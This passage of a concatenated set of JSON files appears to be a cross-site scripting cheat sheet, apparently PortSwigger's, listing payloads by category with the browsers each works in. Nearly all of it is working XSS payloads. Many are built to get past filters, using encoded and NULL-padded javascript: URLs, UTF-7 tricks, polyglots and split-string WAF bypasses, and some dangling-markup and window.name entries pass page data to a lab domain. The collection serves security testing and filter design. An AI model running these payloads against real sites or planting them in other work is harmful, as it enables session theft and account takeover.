234 |     },
235 |     {
236 |         "description": "Using object window name to pass data from the page",
237 |         "code": "<object data=http:\/\/subdomain1.portswigger-labs.net\/dangling_markup\/name.html name=\"",
238 |         "browsers": [
239 |             "chrome",
240 |             "firefox",
241 |             "edge",
242 |             "safari"
243 |         ]
244 |     },
245 |     {
246 |         "description": "Using frame window name to pass data from the page",
247 |         "code": "<frameset><frame src=http:\/\/subdomain1.portswigger-labs.net\/dangling_markup\/name.html name=\"",
248 |         "browsers": [
249 |             "chrome",
250 |             "firefox",
251 |             "edge",
252 |             "safari"
253 |         ]
254 |     }
255 | ]
256 | 


--------------------------------------------------------------------------------
/json/encodings.json:
--------------------------------------------------------------------------------
  1 | [
  2 |     {
  3 |         "description": "Overlong UTF-8",
  4 |         "code": "%C0%BCscript>alert(1)<\/script>\n%E0%80%BCscript>alert(1)<\/script>\n%F0%80%80%BCscript>alert(1)<\/script>\n%F8%80%80%80%BCscript>alert(1)<\/script>\n%FC%80%80%80%80%BCscript>alert(1)<\/script>",
  5 |         "browsers": [
  6 |             "chrome",
  7 |             "firefox",
  8 |             "edge",
  9 |             "safari"
 10 |         ]
 11 |     },
 12 |     {
 13 |         "description": "Unicode escapes",
 14 |         "code": "<script>\\u0061lert(1)<\/script>",
 15 |         "browsers": [
 16 |             "chrome",
 17 |             "firefox",
 18 |             "edge",
 19 |             "safari"
 20 |         ]
 21 |     },
 22 |     {
 23 |         "description": "Unicode escapes ES6 style",
 24 |         "code": "<script>\\u{61}lert(1)<\/script>",
 25 |         "browsers": [
 26 |             "chrome",
 27 |             "firefox",
 28 |             "edge",
 29 |             "safari"
 30 |         ]
 31 |     },
 32 |     {
 33 |         "description": "Unicode escapes ES6 style zero padded",
 34 |         "code": "<script>\\u{0000000061}lert(1)<\/script>",
 35 |         "browsers": [
 36 |             "chrome",
 37 |             "firefox",
 38 |             "edge",
 39 |             "safari"
 40 |         ]
 41 |     },
 42 |     {
 43 |         "description": "Hex encoding JavaScript escapes",
 44 |         "code": "<script>eval('\\x61lert(1)')<\/script>",
 45 |         "browsers": [
 46 |             "chrome",
 47 |             "firefox",
 48 |             "edge",
 49 |             "safari"
 50 |         ]
 51 |     },
 52 |     {
 53 |         "description": "Octal encoding",
 54 |         "code": "<script>eval('\\141lert(1)')<\/script>\n<script>eval('alert(\\061)')<\/script>\n<script>eval('alert(\\61)')<\/script>",
 55 |         "browsers": [
 56 |             "chrome",
 57 |             "firefox",
 58 |             "edge",
 59 |             "safari"
 60 |         ]
 61 |     },
 62 |     {
 63 |         "description": "Decimal encoding with optional semi-colon",
 64 |         "code": "<a href=\"&#106;avascript:alert(1)\">XSS<\/a><a href=\"&#106avascript:alert(1)\">XSS<\/a>",
 65 |         "browsers": [
 66 |             "chrome",
 67 |             "firefox",
 68 |             "edge",
 69 |             "safari"
 70 |         ]
 71 |     },
 72 |     {
 73 |         "description": "SVG script with HTML encoding",
 74 |         "code": "<svg><script>&#97;lert(1)<\/script><\/svg>\n<svg><script>&#x61;lert(1)<\/script><\/svg>\n<svg><script>alert&NewLine;(1)<\/script><\/svg>\n<svg><script>x=\"&quot;,alert(1)\/\/\";<\/script><\/svg>",
 75 |         "browsers": [
 76 |             "chrome",
 77 |             "firefox",
 78 |             "edge",
 79 |             "safari"
 80 |         ]
 81 |     },
 82 |     {
 83 |         "description": "Decimal encoding with padded zeros",
 84 |         "code": "<a href=\"&#0000106avascript:alert(1)\">XSS<\/a>",
 85 |         "browsers": [
 86 |             "chrome",
 87 |             "firefox",
 88 |             "edge",
 89 |             "safari"
 90 |         ]
 91 |     },
 92 |     {
 93 |         "description": "Hex encoding entities",
 94 |         "code": "<a href=\"&#x6a;avascript:alert(1)\">XSS<\/a>",
 95 |         "browsers": [
 96 |             "chrome",
 97 |             "firefox",
 98 |             "edge",
 99 |             "safari"
100 |         ]
101 |     },
102 |     {
103 |         "description": "Hex encoding without semi-colon provided next character is not a-f0-9",
104 |         "code": "<a href=\"j&#x61vascript:alert(1)\">XSS<\/a>\n<a href=\"&#x6a\navascript:alert(1)\">XSS<\/a>\n<a href=\"&#x6a avascript:alert(1)\">XSS<\/a>",
105 |         "browsers": [
106 |             "chrome",
107 |             "firefox",
108 |             "edge",
109 |             "safari"
110 |         ]
111 |     },
112 |     {
113 |         "description": "Hex encoding with padded zeros",
114 |         "code": "<a href=\"&#x0000006a;avascript:alert(1)\">XSS<\/a>",
115 |         "browsers": [
116 |             "chrome",
117 |             "firefox",
118 |             "edge",
119 |             "safari"
120 |         ]
121 |     },
122 |     {
123 |         "description": "Hex encoding is not case sensitive",
124 |         "code": "<a href=\"&#X6A;avascript:alert(1)\">XSS<\/a>",
125 |         "browsers": [
126 |             "chrome",
127 |             "firefox",
128 |             "edge",
129 |             "safari"
130 |         ]
131 |     },
132 |     {
133 |         "description": "HTML entities",
134 |         "code": "<a href=\"javascript&colon;alert(1)\">XSS<\/a>\n<a href=\"java&Tab;script:alert(1)\">XSS<\/a>\n<a href=\"java&NewLine;script:alert(1)\">XSS<\/a>\n<a href=\"javascript&colon;alert&lpar;1&rpar;\">XSS<\/a>",
135 |         "browsers": [
136 |             "chrome",
137 |             "firefox",
138 |             "edge",
139 |             "safari"
140 |         ]
141 |     },
142 |     {
143 |         "description": "URL encoding",
144 |         "code": "<a href=\"javascript:x='%27-alert(1)-%27';\">XSS<\/a>",
145 |         "browsers": [
146 |             "chrome",
147 |             "firefox",
148 |             "edge",
149 |             "safari"
150 |         ]
151 |     },
152 |     {
153 |         "description": "HTML entities and URL encoding",
154 |         "code": "<a href=\"javascript:x='&percnt;27-alert(1)-%27';\">XSS<\/a>",
155 |         "browsers": [
156 |             "chrome",
157 |             "firefox",
158 |             "edge",
159 |             "safari"
160 |         ]
161 |     }
162 | ]
163 | 


--------------------------------------------------------------------------------
/json/frameworks.json:
--------------------------------------------------------------------------------
 1 | [
 2 |     {
 3 |         "description": "Bootstrap onanimationstart event",
 4 |         "code": "<xss class=progress-bar-animated onanimationstart=alert(1)>",
 5 |         "browsers": [
 6 |             "chrome",
 7 |             "firefox",
 8 |             "edge",
 9 |             "safari"
10 |         ]
11 |     },
12 |     {
13 |         "description": "Bootstrap ontransitionend event",
14 |         "code": "<xss class=\"carousel slide\" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class=\"carousel-item active\"></xss><xss class=carousel-item></xss></xss></xss>",
15 |         "browsers": [
16 |             "chrome",
17 |             "firefox",
18 |             "edge",
19 |             "safari"
20 |         ]
21 |     }
22 | ]
23 | 


--------------------------------------------------------------------------------
/json/obfuscation.json:
--------------------------------------------------------------------------------
 1 | [
 2 |     {
 3 |         "description": "Firefox allows NULLS after &",
 4 |         "code": "<a href=\"javascript&\u0000#x6a;avascript:alert(1)\">Firefox<\/a>",
 5 |         "browsers": [
 6 |             "firefox"
 7 |         ]
 8 |     },
 9 |     {
10 |         "description": "Firefox allows NULLs inside named entities",
11 |         "code": "<a href=\"javascript&\u0000colon\u0000;alert(1)\">Firefox<\/a>",
12 |         "browsers": [
13 |             "firefox"
14 |         ]
15 |     },
16 |     {
17 |         "description": "Firefox allows NULL characters inside opening comments",
18 |         "code": "<!-\u0000- ><img title=\"--><iframe\/onload=alert(1)>\"> -->\n<!-\u0000\u0000\u0000\u0000\u0000- ><img title=\"--><iframe\/onload=alert(1)>\"> -->",
19 |         "browsers": [
20 |             "firefox"
21 |         ]
22 |     },
23 |     {
24 |         "description": "Data protocol inside script src with base64",
25 |         "code": "<script src=data:text/javascript;base64,YWxlcnQoMSk=><\/script>",
26 |         "browsers": [
27 |             "chrome",
28 |             "firefox",
29 |             "edge",
30 |             "safari"
31 |         ]
32 |     }
33 | ]
34 | 


--------------------------------------------------------------------------------
/json/polyglot.json:
--------------------------------------------------------------------------------
 1 | [
 2 |     {
 3 |         "description": "Polyglot payload 1",
 4 |         "code": "javascript:\/*--><\/title><\/style><\/textarea><\/script><\/xmp><svg\/onload='+\/\"\/+\/onmouseover=1\/+\/[*\/[]\/+alert(1)\/\/'>",
 5 |         "browsers": [
 6 |             "chrome",
 7 |             "firefox",
 8 |             "edge",
 9 |             "safari"
10 |         ],
11 |         "author": "Gareth Heyes",
12 |         "authorLink": "https:\/\/twitter.com\/garethheyes"
13 |     },
14 |     {
15 |         "description": "Polyglot payload 2",
16 |         "code": "javascript:\"\/*'\/*`\/*--><\/noscript><\/title><\/textarea><\/style><\/template><\/noembed><\/script><html \\\"\n onmouseover=\/*&lt;svg\/*\/onload=alert()\/\/>",
17 |         "browsers": [
18 |             "chrome",
19 |             "firefox",
20 |             "edge",
21 |             "safari"
22 |         ],
23 |         "author": "Crlf",
24 |         "authorLink": "http:\/\/polyglot.innerht.ml\/"
25 |     }
26 | ]
27 | 


--------------------------------------------------------------------------------
/json/protocols.json:
--------------------------------------------------------------------------------
  1 | [
  2 |     {
  3 |         "description": "Iframe src attribute JavaScript protocol",
  4 |         "code": "<iframe src=\"javascript:alert(1)\">",
  5 |         "browsers": [
  6 |             "chrome",
  7 |             "firefox",
  8 |             "edge",
  9 |             "safari"
 10 |         ]
 11 |     },
 12 |     {
 13 |         "description": "Object data attribute with JavaScript protocol",
 14 |         "code": "<object data=\"javascript:alert(1)\">",
 15 |         "browsers": [
 16 |             "firefox"
 17 |         ]
 18 |     },
 19 |     {
 20 |         "description": "Embed src attribute with JavaScript protocol",
 21 |         "code": "<embed src=\"javascript:alert(1)\">",
 22 |         "browsers": [
 23 |             "firefox"
 24 |         ]
 25 |     },
 26 |     {
 27 |         "description": "A standard JavaScript protocol",
 28 |         "code": "<a href=\"javascript:alert(1)\">XSS<\/a>",
 29 |         "browsers": [
 30 |             "chrome",
 31 |             "firefox",
 32 |             "edge",
 33 |             "safari"
 34 |         ]
 35 |     },
 36 |     {
 37 |         "description": "The protocol is not case sensitive",
 38 |         "code": "<a href=\"JaVaScript:alert(1)\">XSS<\/a>",
 39 |         "browsers": [
 40 |             "chrome",
 41 |             "firefox",
 42 |             "edge",
 43 |             "safari"
 44 |         ]
 45 |     },
 46 |     {
 47 |         "description": "Characters \\x01-\\x20 are allowed before the protocol",
 48 |         "code": "<a href=\" \tjavascript:alert(1)\">XSS<\/a>",
 49 |         "browsers": [
 50 |             "chrome",
 51 |             "firefox",
 52 |             "edge",
 53 |             "safari"
 54 |         ]
 55 |     },
 56 |     {
 57 |         "description": "Characters \\x09,\\x0a,\\x0d are allowed inside the protocol",
 58 |         "code": "<a href=\"javas\tcript:alert(1)\">XSS<\/a>",
 59 |         "browsers": [
 60 |             "chrome",
 61 |             "firefox",
 62 |             "edge",
 63 |             "safari"
 64 |         ]
 65 |     },
 66 |     {
 67 |         "description": "Characters \\x09,\\x0a,\\x0d are allowed after protocol name before the colon",
 68 |         "code": "<a href=\"javascript\n:alert(1)\">XSS<\/a>",
 69 |         "browsers": [
 70 |             "chrome",
 71 |             "firefox",
 72 |             "edge",
 73 |             "safari"
 74 |         ]
 75 |     },
 76 |     {
 77 |         "description": "Xlink namespace inside SVG with JavaScript protocol",
 78 |         "code": "<svg><a xlink:href=\"javascript:alert(1)\"><text x=\"20\" y=\"20\">XSS<\/text><\/a>",
 79 |         "browsers": [
 80 |             "chrome",
 81 |             "firefox",
 82 |             "edge",
 83 |             "safari"
 84 |         ]
 85 |     },
 86 |     {
 87 |         "description": "SVG animate tag using values",
 88 |         "code": "<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) \/><a id=xss><text x=20 y=20>XSS<\/text><\/a>",
 89 |         "browsers": [
 90 |             "chrome",
 91 |             "firefox",
 92 |             "edge",
 93 |             "safari"
 94 |         ]
 95 |     },
 96 |     {
 97 |         "description": "SVG animate tag using to",
 98 |         "code": "<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 \/><a id=xss><text x=20 y=20>XSS<\/text><\/a>",
 99 |         "browsers": [
100 |             "chrome",
101 |             "firefox",
102 |             "edge",
103 |             "safari"
104 |         ]
105 |     },
106 |     {
107 |         "description": "SVG set tag",
108 |         "code": "<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) \/><a id=xss><text x=20 y=20>XSS<\/text><\/a>",
109 |         "browsers": [
110 |             "chrome",
111 |             "firefox",
112 |             "edge",
113 |             "safari"
114 |         ]
115 |     },
116 |     {
117 |         "description": "Data protocol inside script src",
118 |         "code": "<script src=\"data:text\/javascript,alert(1)\"><\/script>",
119 |         "browsers": [
120 |             "chrome",
121 |             "firefox",
122 |             "edge",
123 |             "safari"
124 |         ]
125 |     },
126 |     {
127 |         "description": "SVG script href attribute without closing script tag",
128 |         "code": "<svg><script href=\"data:text\/javascript,alert(1)\" \/>",
129 |         "browsers": [
130 |             "firefox",
131 |             "edge"
132 |         ]
133 |     },
134 |     {
135 |         "description": "SVG use element Chrome\/Firefox",
136 |         "code": "<svg><use href=\"data:image\/svg+xml,<svg id='x' xmlns='http:\/\/www.w3.org\/2000\/svg' xmlns:xlink='http:\/\/www.w3.org\/1999\/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' \/><\/a><\/svg>#x\"><\/use><\/svg>",
137 |         "browsers": [
138 |             "chrome",
139 |             "firefox"
140 |         ]
141 |     },
142 |     {
143 |         "description": "Import statement with data URL",
144 |         "code": "<script>import('data:text\/javascript,alert(1)')<\/script>",
145 |         "browsers": [
146 |             "chrome",
147 |             "firefox",
148 |             "edge",
149 |             "safari"
150 |         ]
151 |     },
152 |     {
153 |         "description": "Base tag with JavaScript protocol rewriting relative URLS",
154 |         "code": "<base href=\"javascript:\/a\/-alert(1)\/\/\/\/\/\/\/\"><a href=..\/lol\/safari.html>test<\/a>",
155 |         "browsers": [
156 |             "safari"
157 |         ]
158 |     },
159 |     {
160 |         "description": "MathML makes any tag clickable",
161 |         "code": "<math><x href=\"javascript:alert(1)\">blah",
162 |         "browsers": [
163 |             "firefox"
164 |         ]
165 |     },
166 |     {
167 |         "description": "Button and formaction",
168 |         "code": "<form><button formaction=javascript:alert(1)>XSS",
169 |         "browsers": [
170 |             "chrome",
171 |             "firefox",
172 |             "edge",
173 |             "safari"
174 |         ]
175 |     },
176 |     {
177 |         "description": "Input and formaction",
178 |         "code": "<form><input type=submit formaction=javascript:alert(1) value=XSS>",
179 |         "browsers": [
180 |             "chrome",
181 |             "firefox",
182 |             "edge",
183 |             "safari"
184 |         ]
185 |     },
186 |     {
187 |         "description": "Form and action",
188 |         "code": "<form action=javascript:alert(1)><input type=submit value=XSS>",
189 |         "browsers": [
190 |             "chrome",
191 |             "firefox",
192 |             "edge",
193 |             "safari"
194 |         ]
195 |     },
196 |     {
197 |         "description": "Isindex and formaction",
198 |         "code": "<isindex type=submit formaction=javascript:alert(1)>",
199 |         "browsers": [
200 |             "edge"
201 |         ]
202 |     },
203 |     {
204 |         "description": "Isindex and action",
205 |         "code": "<isindex type=submit action=javascript:alert(1)>",
206 |         "browsers": [
207 |             "edge"
208 |         ]
209 |     },
210 |     {
211 |         "description": "Use element with an external URL",
212 |         "code": "<svg><use href=\"//subdomain1.portswigger-labs.net/use_element/upload.php#x\" /></svg>",
213 |         "browsers": [
214 |             "edge"
215 |         ],
216 |         "url": "http://portswigger-labs.net/xss/xss.php?x=%3Csvg%3E%3Cuse%20href%3D%22%2F%2Fsubdomain1.portswigger-labs.net%2Fuse_element%2Fupload.php%23x%22%20%2F%3E%3C%2Fsvg%3E&context=html"
217 |     }
218 | ]
219 | 


--------------------------------------------------------------------------------
/json/restricted_characters.json:
--------------------------------------------------------------------------------
  1 | [
  2 |     {
  3 |         "description": "No parentheses using exception handling",
  4 |         "code": "<script>onerror=alert;throw 1<\/script>",
  5 |         "browsers": [
  6 |             "chrome",
  7 |             "firefox",
  8 |             "edge",
  9 |             "safari"
 10 |         ],
 11 |         "url": ""
 12 |     },
 13 |     {
 14 |         "description": "No parentheses using exception handling no semi colons",
 15 |         "code": "<script>{onerror=alert}throw 1<\/script>",
 16 |         "browsers": [
 17 |             "chrome",
 18 |             "firefox",
 19 |             "edge",
 20 |             "safari"
 21 |         ],
 22 |         "url": ""
 23 |     },
 24 |     {
 25 |         "description": "No parentheses using exception handling no semi colons using expressions",
 26 |         "code": "<script>throw onerror=alert,1<\/script>",
 27 |         "browsers": [
 28 |             "chrome",
 29 |             "firefox",
 30 |             "edge",
 31 |             "safari"
 32 |         ],
 33 |         "url": ""
 34 |     },
 35 |     {
 36 |         "description": "No parentheses using exception handling and eval",
 37 |         "code": "<script>throw onerror=eval,'=alert\\x281\\x29'<\/script>",
 38 |         "browsers": [
 39 |             "chrome",
 40 |             "firefox",
 41 |             "edge",
 42 |             "safari"
 43 |         ],
 44 |         "url": ""
 45 |     },
 46 |     {
 47 |         "description": "No parentheses using exception handling and eval on Firefox",
 48 |         "code": "<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\\x281\\x29'}<\/script>",
 49 |         "browsers": [
 50 |             "chrome",
 51 |             "firefox",
 52 |             "edge",
 53 |             "safari"
 54 |         ],
 55 |         "url": ""
 56 |     },
 57 |     {
 58 |         "description": "No parentheses using ES6 hasInstance and instanceof with eval",
 59 |         "code": "<script>'alert\\x281\\x29'instanceof{[Symbol.hasInstance]:eval}<\/script>",
 60 |         "browsers": [
 61 |             "chrome",
 62 |             "firefox",
 63 |             "edge",
 64 |             "safari"
 65 |         ],
 66 |         "url": ""
 67 |     },
 68 |     {
 69 |         "description": "No parentheses using ES6 hasInstance and instanceof with eval without .",
 70 |         "code": "<script>'alert\\x281\\x29'instanceof{[Symbol['hasInstance']]:eval}<\/script>",
 71 |         "browsers": [
 72 |             "chrome",
 73 |             "firefox",
 74 |             "edge",
 75 |             "safari"
 76 |         ],
 77 |         "url": ""
 78 |     },
 79 |     {
 80 |         "description": "No parentheses using location redirect",
 81 |         "code": "<script>location='javascript:alert\\x281\\x29'<\/script>",
 82 |         "browsers": [
 83 |             "chrome",
 84 |             "firefox",
 85 |             "edge",
 86 |             "safari"
 87 |         ],
 88 |         "url": ""
 89 |     },
 90 |     {
 91 |         "description": "No parentheses using location redirect no strings",
 92 |         "code": "<script>location=name<\/script>",
 93 |         "browsers": [
 94 |             "chrome",
 95 |             "firefox",
 96 |             "edge",
 97 |             "safari"
 98 |         ],
 99 |         "url": "http:\/\/subdomain1.portswigger-labs.net\/xss\/xss.php?x=%3Ciframe%20name=javascript:alert(1)%20src%3D%22https%3A%2F%2Fportswigger-labs.net%2Fxss%2Fxss.php%3Fx%3D%3Cscript%3Elocation=name%3C\/script%3E%22%3E%3C%2Fiframe%3E"
100 |     },
101 |     {
102 |         "description": "No parentheses using template strings",
103 |         "code": "<script>alert`1`<\/script>",
104 |         "browsers": [
105 |             "chrome",
106 |             "firefox",
107 |             "edge",
108 |             "safari"
109 |         ],
110 |         "url": ""
111 |     }
112 | ]
113 | 


--------------------------------------------------------------------------------
/json/special_tags.json:
--------------------------------------------------------------------------------
 1 | [
 2 |     {
 3 |         "description": "Redirect to a different domain",
 4 |         "code": "<meta http-equiv=\"refresh\" content=\"0; url=\/\/portswigger-labs.net\">",
 5 |         "browsers": [
 6 |             "chrome",
 7 |             "firefox",
 8 |             "edge",
 9 |             "safari"
10 |         ]
11 |     },
12 |     {
13 |         "description": "Meta charset attribute UTF-7",
14 |         "code": "<meta charset=\"UTF-7\" \/> +ADw-script+AD4-alert(1)+ADw-\/script+AD4-",
15 |         "browsers": [
16 |             "edge"
17 |         ]
18 |     },
19 |     {
20 |         "description": "Meta charset UTF-7",
21 |         "code": "<meta http-equiv=\"Content-Type\" content=\"text\/html; charset=UTF-7\" \/> +ADw-script+AD4-alert(1)+ADw-\/script+AD4-",
22 |         "browsers": [
23 |             "edge"
24 |         ]
25 |     },
26 |     {
27 |         "description": "UTF-7 BOM characters (Has to be at the start of the document) 1",
28 |         "code": "+\/v8\n+ADw-script+AD4-alert(1)+ADw-\/script+AD4-",
29 |         "browsers": [
30 |             "edge"
31 |         ]
32 |     },
33 |     {
34 |         "description": "UTF-7 BOM characters (Has to be at the start of the document) 2",
35 |         "code": "+\/v9\n+ADw-script+AD4-alert(1)+ADw-\/script+AD4-",
36 |         "browsers": [
37 |             "edge"
38 |         ]
39 |     },
40 |     {
41 |         "description": "UTF-7 BOM characters (Has to be at the start of the document) 3",
42 |         "code": "+\/v+\n+ADw-script+AD4-alert(1)+ADw-\/script+AD4-",
43 |         "browsers": [
44 |             "edge"
45 |         ]
46 |     },
47 |     {
48 |         "description": "UTF-7 BOM characters (Has to be at the start of the document) 4",
49 |         "code": "+\/v\/\n+ADw-script+AD4-alert(1)+ADw-\/script+AD4-",
50 |         "browsers": [
51 |             "edge"
52 |         ]
53 |     },
54 |     {
55 |         "description": "Upgrade insecure requests",
56 |         "code": "<meta http-equiv=\"Content-Security-Policy\" content=\"upgrade-insecure-requests\">",
57 |         "browsers": [
58 |             "chrome",
59 |             "firefox",
60 |             "edge",
61 |             "safari"
62 |         ]
63 |     },
64 |     {
65 |         "description": "Disable JavaScript via iframe sandbox",
66 |         "code": "<iframe sandbox src=\"\/\/portswigger-labs.net\"><\/iframe>",
67 |         "browsers": [
68 |             "chrome",
69 |             "firefox",
70 |             "edge",
71 |             "safari"
72 |         ]
73 |     },
74 |     {
75 |         "description": "Disable referer",
76 |         "code": "<meta name=\"referrer\" content=\"no-referrer\">",
77 |         "browsers": [
78 |             "chrome",
79 |             "firefox",
80 |             "edge",
81 |             "safari"
82 |         ]
83 |     }
84 | ]
85 | 


--------------------------------------------------------------------------------
/json/useful_tags.json:
--------------------------------------------------------------------------------
  1 | [
  2 |     {
  3 |         "description": "Using srcdoc attribute",
  4 |         "code": "<iframe srcdoc=\"<img src=1 onerror=alert(1)>\"><\/iframe>",
  5 |         "browsers": [
  6 |             "chrome",
  7 |             "firefox",
  8 |             "edge",
  9 |             "safari"
 10 |         ]
 11 |     },
 12 |     {
 13 |         "description": "Using srcdoc with entities",
 14 |         "code": "<iframe srcdoc=\"&lt;img src=1 onerror=alert(1)&gt;\"><\/iframe>",
 15 |         "browsers": [
 16 |             "chrome",
 17 |             "firefox",
 18 |             "edge",
 19 |             "safari"
 20 |         ]
 21 |     },
 22 |     {
 23 |         "description": "Click a submit element from anywhere on the page, even outside the form",
 24 |         "code": "<form action=\"javascript:alert(1)\"><input type=submit id=x><\/form><label for=x>XSS<\/label>",
 25 |         "browsers": [
 26 |             "chrome",
 27 |             "firefox",
 28 |             "edge",
 29 |             "safari"
 30 |         ]
 31 |     },
 32 |     {
 33 |         "description": "Hidden inputs: Access key attributes can enable XSS on normally unexploitable elements",
 34 |         "code": "<input type=\"hidden\" accesskey=\"X\" onclick=\"alert(1)\"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)",
 35 |         "browsers": [
 36 |             "firefox"
 37 |         ]
 38 |     },
 39 |     {
 40 |         "description": "Link elements: Access key attributes can enable XSS on normally unexploitable elements",
 41 |         "code": "<link rel=\"canonical\" accesskey=\"X\" onclick=\"alert(1)\" \/> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)",
 42 |         "browsers": [
 43 |             "chrome"
 44 |         ]
 45 |     },
 46 |     {
 47 |         "description": "Download attribute can save a copy of the current webpage",
 48 |         "code": "<a href=# download=\"filename.html\">Test<\/a>",
 49 |         "browsers": [
 50 |             "chrome",
 51 |             "firefox",
 52 |             "edge",
 53 |             "safari"
 54 |         ]
 55 |     },
 56 |     {
 57 |         "description": "Disable referrer using referrerpolicy",
 58 |         "code": "<img referrerpolicy=\"no-referrer\" src=\"\/\/portswigger-labs.net\">",
 59 |         "browsers": [
 60 |             "chrome",
 61 |             "firefox",
 62 |             "edge",
 63 |             "safari"
 64 |         ]
 65 |     },
 66 |     {
 67 |         "description": "Set window.name via parameter on the window.open function",
 68 |         "code": "<a href=# onclick=\"window.open('http:\/\/subdomain1.portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;eval(name)\/\/','alert(1)')\">XSS</a>",
 69 |         "browsers": [
 70 |             "chrome",
 71 |             "firefox",
 72 |             "edge",
 73 |             "safari"
 74 |         ]
 75 |     },
 76 |     {
 77 |         "description": "Set window.name via name attribute in a <iframe> tag",
 78 |         "code": "<iframe name=\"alert(1)\" src=\"https:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;eval(name)\/\/\"></iframe>",
 79 |         "browsers": [
 80 |             "chrome",
 81 |             "firefox",
 82 |             "edge",
 83 |             "safari"
 84 |         ]
 85 |     },
 86 |     {
 87 |         "description": "Set window.name via target attribute in a <base> tag",
 88 |         "code": "<base target=\"alert(1)\"><a href=\"http:\/\/subdomain1.portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;eval(name)\/\/\">XSS via target in base tag</a>",
 89 |         "browsers": [
 90 |             "chrome",
 91 |             "firefox",
 92 |             "edge",
 93 |             "safari"
 94 |         ]
 95 |     },
 96 |     {
 97 |         "description": "Set window.name via target attribute in a <a> tag",
 98 |         "code": "<a target=\"alert(1)\" href=\"http:\/\/subdomain1.portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;eval(name)\/\/\">XSS via target in a tag</a>",
 99 |         "browsers": [
100 |             "chrome",
101 |             "firefox",
102 |             "edge",
103 |             "safari"
104 |         ]
105 |     },
106 |     {
107 |         "description": "Set window.name via usemap attribute in a <img> tag",
108 |         "code": "<img src=\"validimage.png\" width=\"10\" height=\"10\" usemap=\"#xss\"><map name=\"xss\"><area shape=\"rect\" coords=\"0,0,82,126\" target=\"alert(1)\" href=\"http:\/\/subdomain1.portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;eval(name)\/\/\"></map>",
109 |         "browsers": [
110 |             "chrome",
111 |             "firefox",
112 |             "edge",
113 |             "safari"
114 |         ]
115 |     },
116 |     {
117 |         "description": "Set window.name via target attribute in a <form> tag",
118 |         "code": "<form action=\"http:\/\/subdomain1.portswigger-labs.net\/xss\/xss.php\" target=\"alert(1)\"><input type=hidden name=x value=\"';eval(name)\/\/\"><input type=hidden name=context value=js_string_single><input type=\"submit\" value=\"XSS via target in a form\"></form>",
119 |         "browsers": [
120 |             "chrome",
121 |             "firefox",
122 |             "edge",
123 |             "safari"
124 |         ]
125 |     },
126 |     {
127 |         "description": "Set window.name via formtarget attribute in a <input> tag type submit",
128 |         "code": "<form><input type=hidden name=x value=\"';eval(name)\/\/\"><input type=hidden name=context value=js_string_single><input type=\"submit\" formaction=\"http:\/\/subdomain1.portswigger-labs.net\/xss\/xss.php\" formtarget=\"alert(1)\" value=\"XSS via formtarget in input type submit\"></form>",
129 |         "browsers": [
130 |             "chrome",
131 |             "firefox",
132 |             "edge",
133 |             "safari"
134 |         ]
135 |     },
136 |     {
137 |         "description": "Set window.name via formtarget attribute in a <input> tag type image",
138 |         "code": "<form><input type=hidden name=x value=\"';eval(name)\/\/\"><input type=hidden name=context value=js_string_single><input name=1 type=\"image\" src=\"validimage.png\" formaction=\"http:\/\/subdomain1.portswigger-labs.net\/xss\/xss.php\" formtarget=\"alert(1)\" value=\"XSS via formtarget in input type image\"></form>",
139 |         "browsers": [
140 |             "chrome",
141 |             "firefox",
142 |             "safari"
143 |         ]
144 |     }
145 | ]
146 | 


--------------------------------------------------------------------------------
/json/waf_bypass_global_obj.json:
--------------------------------------------------------------------------------
  1 | [
  2 |     {
  3 |         "description": "Reflected XSS into a JavaScript string: string concatenation (window)",
  4 |         "code": "';window['ale'+'rt'](window['doc'+'ument']['dom'+'ain']);\/\/",
  5 |         "browsers": [
  6 |             "chrome",
  7 |             "firefox",
  8 |             "edge",
  9 |             "safari"
 10 |         ],
 11 |         "context": "js_string_single"
 12 |     },
 13 |     {
 14 |         "description": "Reflected XSS into a JavaScript string: string concatenation (self)",
 15 |         "code": "';self['ale'+'rt'](self['doc'+'ument']['dom'+'ain']);\/\/",
 16 |         "browsers": [
 17 |             "chrome",
 18 |             "firefox",
 19 |             "edge",
 20 |             "safari"
 21 |         ],
 22 |         "context": "js_string_single"
 23 |     },
 24 |     {
 25 |         "description": "Reflected XSS into a JavaScript string: string concatenation (this)",
 26 |         "code": "';this['ale'+'rt'](this['doc'+'ument']['dom'+'ain']);\/\/",
 27 |         "browsers": [
 28 |             "chrome",
 29 |             "firefox",
 30 |             "edge",
 31 |             "safari"
 32 |         ],
 33 |         "context": "js_string_single"
 34 |     },
 35 |     {
 36 |         "description": "Reflected XSS into a JavaScript string: string concatenation (top)",
 37 |         "code": "';top['ale'+'rt'](top['doc'+'ument']['dom'+'ain']);\/\/",
 38 |         "browsers": [
 39 |             "chrome",
 40 |             "firefox",
 41 |             "edge",
 42 |             "safari"
 43 |         ],
 44 |         "context": "js_string_single"
 45 |     },
 46 |     {
 47 |         "description": "Reflected XSS into a JavaScript string: string concatenation (parent)",
 48 |         "code": "';parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain']);\/\/",
 49 |         "browsers": [
 50 |             "chrome",
 51 |             "firefox",
 52 |             "edge",
 53 |             "safari"
 54 |         ],
 55 |         "context": "js_string_single"
 56 |     },
 57 |     {
 58 |         "description": "Reflected XSS into a JavaScript string: string concatenation (frames)",
 59 |         "code": "';frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain']);\/\/",
 60 |         "browsers": [
 61 |             "chrome",
 62 |             "firefox",
 63 |             "edge",
 64 |             "safari"
 65 |         ],
 66 |         "context": "js_string_single"
 67 |     },
 68 |     {
 69 |         "description": "Reflected XSS into a JavaScript string: string concatenation (globalThis)",
 70 |         "code": "';globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain']);\/\/",
 71 |         "browsers": [
 72 |             "chrome",
 73 |             "firefox",
 74 |             "edge",
 75 |             "safari"
 76 |         ],
 77 |         "context": "js_string_single"
